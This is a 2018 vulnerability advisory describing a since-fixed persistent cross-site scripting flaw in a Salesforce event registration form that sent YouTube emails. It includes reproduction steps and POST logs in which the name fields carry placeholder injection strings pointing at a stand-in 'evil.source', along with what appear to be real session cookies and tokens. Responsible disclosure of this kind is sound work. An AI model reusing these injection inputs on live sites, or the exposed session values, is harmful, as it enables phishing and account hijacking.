Salesforce RegistrationForm - Persistent Web Vulnerability

2018-06-22T00:00:00
ID VULNERLAB:2054
Type vulnerlab
Reporter Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Modified 2018-06-22T00:00:00

Description

                                        
                                            Document Title:
===============
Salesforce RegistrationForm - Persistent Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2054

Salesforce Security ID: 219513


Release Date:
=============
2018-06-22


Vulnerability Laboratory ID (VL-ID):
====================================
2054


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Salesforce.com is an American cloud computing company headquartered in San Francisco, California. 
Though its revenue comes from a customer relationship management (CRM) product, Salesforce also 
capitalizes on commercial applications of social networking through acquisition. As of early 2016, 
it is one of the most highly valued American cloud computing companies with a market capitalization 
above $55 billion, although the company has never turned a GAAP profit in any fiscal year since its 
inception in 1999.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Salesforce.com )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in 
the Salesforce RegistrationForm web-application for google youtube.


Vulnerability Disclosure Timeline:
==================================
2018-06-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Salesforce
Product: Event Registration - Online Service (Web-Application) 2017 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure Program


Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the salesforce event registration formular for the 
google youtube creators application. The vulnerability typ allows remote attackers to inject own malicious script code 
on the application-side to compromise modules and functions targeted client-side attacks. 

The issue injection point is the salesforce registration formular and the final affected vulnerable sender url is the 
original youtube domain server. Attackers are able to inject malicious script code to deliver manipulated emails via 
original youtube domain sender. The attack vector is located on the application-side and the request method to inject 
is POST. The risk of the vulnerability is estimated medium to high.

The security risk of the persistent input validation vulnerability is estimated as medium with a cvss count of 4.2.
Exploitation of the persistent input validation web vulnerability requires low user interaction and no privileged 
web-application customer user account. Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of 
affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Event Registration - Youtube Google

Vulnerable Input Fields(s):
[+] Firstname
[+] Lastname

Vulnerable Parameter(s):
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA
[+] j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA

Affected Module(s):
[+] Email & Frontend (creator-academy-noreply@youtube.com)

Affected Domain(s):
[+] youtube.com (google)
[+] salesforce (force.com)


Proof of Concept (PoC):
=======================
The persistent cross site vulnerability can be exploited by remote attackers without privilege web-application user account and with low user interaction.
For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the vulnerability formular
2. Inject the test payloads and the vulnerable marked name input fields
3. Include random values and an exisiting test mailbox and save the request via POST
Note: The wrong filtering application takes the data to the youtube creator events
4. An email arrives in the registered and unconfirmed emailbox by the original youtube sender
5. The execute of the payload occurs next to the name introduction in the email body message template generated by the dbms
6. Successful reproduce of the stored xss web vulnerability!

Note: Both parties needs to fix the issue so i would like to combine the report to assist youtube on google and and salesforce 
by there bug bounty programs.


PoC: Vulnerable Source
<tr>
<td style="padding:20px; background-color:#FFF;">
<table style="width:100%;" cellspacing="0" cellpadding="0">
<tr>
<td align="center" style="font-family:Roboto, Helvetica Neue, Helvetica, Arial, sans-serif; 
font-size:24px; line-height:28px; padding-top:10px; color:#666;">
Hey there, "><[MALICIOUS EXECUTE IN NAME]>%20>"<[MALICIOUS EXECUTE IN NAME]>!</td></tr>
<tr>
<td align="center" style="padding-top:30px; font-family:Roboto, Helvetica Neue, Helvetica, Arial, sans-serif; font-size:14px; 
line-height:20px; color:#666;">So you’re ready to take on the world with your channel, huh? That’s awesome! Because we’ve got 
some pretty neat tools and ideas that can help you connect with people all over the globe. Ready to go? Just hit that big red 
button below.</td></tr>


PoC: Youtube Ajax Session Token
QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D


--- PoC Session Logs [POST] (Injection Point) ---
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-	3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137382]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[_viewRoot]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsInYiOiIwMDAwMDAwMDAwMDAwMDAiLCJhIjoidmZlbmNyeXB0aW9ua2V5Ii
	widSI6IjAwNTgwMDAwMDA4OWhGbyJ9mBYmEqvd%2B%2BrqUb8vM1fzpu%2BWhaBToaYNeTJ7jwAAAVtJlHbic6ZoGz41Gk8BAG7fRxiwtjM%2B5P6hSLFA4efTPzm08kfq%2F%2B
	dzoOC95QLuLVPoyIIzHs6xtoomj7aD6qCap52FMutgqS2%2BZ]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkltdGZjRzFJVTNZNE5qQlpSR0pzV1hkd2RYWTBlVkF6YkhsMlQzbENOeTFXYWpZM1dHTnNiRVJMU21kY
	2RUQXdNMlFpTENKMGVYQWlPaUp
	LVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNR
	EF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjB
	JbDBzSW1saGRDSTZNVFE1TVRVNE9ERXhPREk0TVN3aVpYaHdJam93ZlE9PS4uX1VJN0g5elhIdjFwVnNOSm80dVJDaVZOaFBJQVIxT1AzVXA1bENfeGRXZz0%3D]
      j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:07 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-		3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137956]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[j_id0%3Aj_id32%3Aj_id155%3Aj_id173]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3Ciframe%3E%2520%3E%22%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI6IjAwRDgwMDAwMDAwUE5UQSIsIWxcDiHyDaSOw17yd3Cg%3D]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkluWnlWa1owVDBoNFNrMTFOM0ZyV1dwTk9UbHNSR1JPUm1seFJtZHlTM0JuTWs1blJVSkVTR2g0VDNOY2RUQXdNMlFpT
	ENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU1VVFWd2lMRndp
	ZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmNJanBjSWpBd05UZ3dNREF
	3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTRPRE01TUN3aVpYaHdJam93ZlE9PS4uVW9Qal
	BBWmNIQjhXRkU4Ulh0THB2T2VzYThkR2dxZE13ZFdOWnM4dVIzbz0%3D]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178[j_id0%3Aj_id32%3Aj_id155%3Aj_id177%3Aj_id178]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:12 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_analytics_series_2016&location=LOCATION_CHANNEL_CHECKLIST&ui_type=
UI_TYPE_DEFAULT&action_update_channel_suggestion=1
Mime Type[application/json]
   Request Header:
      Host[www.youtube.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      X-YouTube-Client-Name[1]
      X-YouTube-Client-Version[1.20170406]
      X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
      X-YouTube-Page-CL[152397198]
      X-YouTube-Page-Label[youtube_20170406_0_RC2]
      X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.youtube.com/user/vulnerability0lab]
      Content-Length[284]
      Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; 
	SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; 
	SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; 
	CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
	FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:QUZVTU5Gd19RV3JFZUhXa
	3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZhNHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOH
	FRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5eFlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53]
      DNT[1]
      Connection[keep-alive]
   POST-Daten:
      o[U]
      session_token	[QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajYzNmpGanYyLXNKOHlZRWQzODBITEVY
	bmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlIxTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJG
	c21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
   Response Header:
      Strict-Transport-Security[max-age=31536000]
      x-frame-options[SAMEORIGIN]
      Content-Length[15]
      Content-Disposition[attachment]
      X-Content-Type-Options[nosniff]
      Expires[Tue, 27 Apr 1971 19:44:06 EST]
      Cache-Control[no-cache]
      Content-Type[application/json; charset=UTF-8]
      Date[Fri, 07 Apr 2017 18:03:21 GMT]
      Server[YouTubeFrontEnd]
      x-xss-protection[1; mode=block]
      Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
      X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://www.youtube.com/creator_suggestions_ajax?new_state=EVENT_SEEN&suggestion=ytca_community_2017&location=LOCATION_CHANNEL_CHECKLIST&ui_type=UI_TYPE_DEFAULT&action_update_channel_suggestion=1 
Mime Type[application/json]
   Request Header:
      Host[www.youtube.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      X-YouTube-Client-Name[1]
      X-YouTube-Client-Version[1.20170406]
      X-YouTube-Identity-Token[QUFFLUhqbkJrbDU2d2cyQk82ZHBZVEc3Tmhyck9teHkzUXw=]
      X-YouTube-Page-CL[152397198]
      X-YouTube-Page-Label[youtube_20170406_0_RC2]
      X-YouTube-Variants-Checksum[2275f96a3a17364aca2366efd7c35d46]
      Content-Type[application/x-www-form-urlencoded]
      Referer[https://www.youtube.com/user/vulnerability0lab]
      Content-Length[284]
      Cookie[VISITOR_INFO1_LIVE=XKr3svEjLco; PREF=f1=50000000&f5=30; YSC=BnHxqoYEhPg; 
	SID=igTRRvC2JTQVE0SXFw0-Jz7I_7brhhCMfb0JocaqLmzZwFWtpYplR1QDIa8VW3BeFKVebQ.; HSID=AfImtCSKjlhjrHodg; 
	SSID=AhWHw2um0Z7WVLOQv; APISID=_ONLJITyRiSfF0or/AKPVNxNp084EAZmxm; SAPISID=tnogHnh4UrZzCXpK/AMF9HkrXhYZRzy2EY; 
	CONSENT=YES+DE.de+20150712-15-0; LOGIN_INFO=AOmCA4wwRQIgekLu-fXR9_7sZgXdrFjyCn_V2riu05Uod5AfZgMn8Q8CIQC7NOOvc_
	FfvwbmqBPi0MajBNCQO2AbfktTASPb9bwAdg:
	QUZVTU5Gd19RV3JFZUhXa3FINUhSYmh5WE8xdDk4cmY5d25KaXB2M1NFYWUwYVY2UFdQMFQ3YWd0amx4QTVzYnZh
	NHBPb241NGFCMGQ3T05LcmhReEwyQTBKWnl4enMxOHFRTFBqY2tiRllIdDNCQk9PcnQyRVNPaGduakg1WVU0OTV5e
	FlVeW44dTNOc3BOM2M1c0pCVlJHNUVseTRBWU53; ST-1qyw03o=ei=8tPnWPWNE4O7WYKQkNgB&feature=
	rc-rel&ved=CMgDEPQcGAAiEwj1zrDO9pLTAhWDXRYKHQIIBBsomxw&csn=8tPnWPWNE4O7WYKQkNgB]
      Connection[keep-alive]
   POST-Daten:
      o[U]
      session_token	[QUFFLUhqbVNxbWRpQ05BWTR2aW1fVF83VW1GNWN5M2RSZ3xBQ3Jtc0ttcWYzWlNrUWIzSkktVC1iYkFaajY
	zNmpGanYyLXNKOHlZRWQzODBITEVYbmlZSUI1XzFKOTlnaVRGTlZBeTdVb1U2LTN5bWNkbW81dmJXQ3JjVlI
	xTV9WdmE1UEhvSkJ0NVpHTXhFTUw2ZHkzQjR0RWF5QUpYbWhzbWt2MlJGc21pTlp2U0Rjelgwd0JVMFJRYlBYWHhBS3hzVVE%3D]
   Response Header:
      X-Content-Type-Options[nosniff]
      Content-Type[application/json; charset=UTF-8]
      Expires[Tue, 27 Apr 1971 19:44:06 EST]
      Strict-Transport-Security[max-age=31536000]
      Content-Length[15]
      x-frame-options[SAMEORIGIN]
      Cache-Control[no-cache]
      Content-Disposition[attachment]
      Date[Fri, 07 Apr 2017 18:03:26 GMT]
      Server[YouTubeFrontEnd]
      x-xss-protection[1; mode=block]
      Alt-Svc[quic=":443"; ma=2592000; v="37,36,35"]
      X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
Mime Type[text/xml]
   Request Header:
      Host[youtube.secure.force.com]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      Referer[https://youtube.secure.force.com/EventRegistration/EventRegistrationPage?Id=Q0hMRUFEK2EwNjgwMDAwMDE1Q3ZGZ0FBSw==
	&visit_id=1-636271849160336494-	3810832860&p=youtube_boot_camp&rd=1]
      Content-Length[137818]
      Cookie[BrowserId=yoz2jmeWR3Gx1dy1LaWrAA]
      Connection[keep-alive]
   POST-Daten:
      AJAXREQUEST[_viewRoot]
      j_id0%3Aj_id32[j_id0%3Aj_id32]
      j_id0%3Aj_id32%3AchildTopicIterate%3A0%3Aj_id137%3A0%3Aj_id145[on]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_firstnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_lastnameJA[%22%3E%3C[MALICIOUS INJECTED XSS PAYLOAD!]%20src%3Devil.source%3E]
      j_id0%3Aj_id32%3Aj_id155%3Ayt_email[bkm%40evolution-sec.com]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id177[Yes]
      j_id0%3Aj_id32%3Aj_id155%3Aj_id186[https%3A%2F%2Fwww.youtube.com%2Fuser%2FDellVlog]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A0%3Aj_id210[To%20learn%20new%20tips%20but%20not%20necessarily%20earn%20a%20letter%20of%20completion.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A1%3Aj_id206[I%20agree%20to%20receive%20occasional%20emails%20from%20YouTube.]
      j_id0%3Aj_id32%3Aj_id155%3AaQPreview%3A2%3Aj_id206[YouTube%20may%20share%20my%20participation%20information%20with%20my%20channel%20owner.]
      com.salesforce.visualforce.ViewState[i%3AAAAAWXsidCI3lYNdCa7hoyPCYB2pOU8KcV%2FuljILNXTK21XGpDFdR1RhEn%2BIaDaP1MJtc5lq1ZYj2vtBBwiM2XiyZ6ynF
	KIdgT53K5Pu28vND9fJ9Q8T%2FP%2FMxHqJ9ohFeKza8vyggT%2F72a%2FP]
      com.salesforce.visualforce.ViewStateVersion[201704062358210694]
      com.salesforce.visualforce.ViewStateMAC	[AGV5SnViMjVqWlNJNkltVXRZbGxtTTBOTWNFZHNhbXBqVkhaa2RITjZVblJpWkdzd1VrbzJTbTVCUjFod1ExRTNhSEJXUlRCY2RUQXd
	NMlFpTENKMGVYQWlPaUpLVjFRaUxDSmhiR2NpT2lKSVV6STFOaUlzSW10cFpDSTZJbnRjSW5SY0lqcGNJakF3UkRnd01EQXdNREF3VUU
	1VVFWd2lMRndpZGx3aU9sd2lNREF3TURBd01EQXdNREF3TURBd1hDSXNYQ0poWENJNlhDSjJabk5wWjI1cGJtZHJaWGxjSWl4Y0luVmN
	JanBjSWpBd05UZ3dNREF3TURBNE9XaEdiMXdpZlNJc0ltTnlhWFFpT2xzaWFXRjBJbDBzSW1saGRDSTZNVFE1TVRVNE9ERTVNekF3TUN
	3aVpYaHdJam93ZlE9PS4uQS10bExWZFhwT3VTVlFqWEhZeVdaSG5MMjBfRGlTTlhxU3ljYkdrandPUT0%3D]
      j_id0%3Aj_id32%3AinitRegistration[j_id0%3Aj_id32%3AinitRegistration]
      []
   Response Header:
      Date[Fri, 07 Apr 2017 18:03:31 GMT]
      x-xss-protection[1; mode=block]
      Cache-Control[no-cache, must-revalidate, max_age=0, no-store,s-maxage=0]
      Content-Security-Policy[reflected-xss block;report-uri /_/ContentDomainCSPNoAuth?type=xss, referrer origin-when-cross-origin]
      X-Powered-By[Salesforce.com ApexPages]
      p3p[CP="CUR OTR STA"]
      Pragma[no-cache]
      Ajax-Response[true]
      Content-Type[text/xml;charset=UTF-8]
      Vary[Accept-Encoding]
      Content-Encoding[gzip]
      Transfer-Encoding[chunked]


Reference(s):
https://youtube.secure.force.com/
https://youtube.secure.force.com/EventRegistration/
https://youtube.secure.force.com/EventRegistration/EventRegistrationPage
https://www.youtube.com/
https://www.youtube.com/creator_suggestions_ajax


Solution - Fix & Patch:
=======================
1. Restrict the input fields and disallow the usage of special chars
2. Parse all inputs or escape in case of processing the POST method request
3. Sanitize the output in the email notification on both parties force.com and youtube.com to prevent targeted exploitation

The issue has been resolved by the salesforce developer team at the end of the year 2017 Q4. The issue was as well 
reported to google youtube to ensure that the malformed content through the input is not forwarded insecure 
to the customers or users. The issue has as been resolved on both parties.


Security Risk:
==============
The security risk of the persistent cross site scripting vulnerability is estimated as medium to high (CVSS 4.3). 
Targeted user accounts are not able to identify the manipulated content because of receiving through the original sender.


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - (research@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™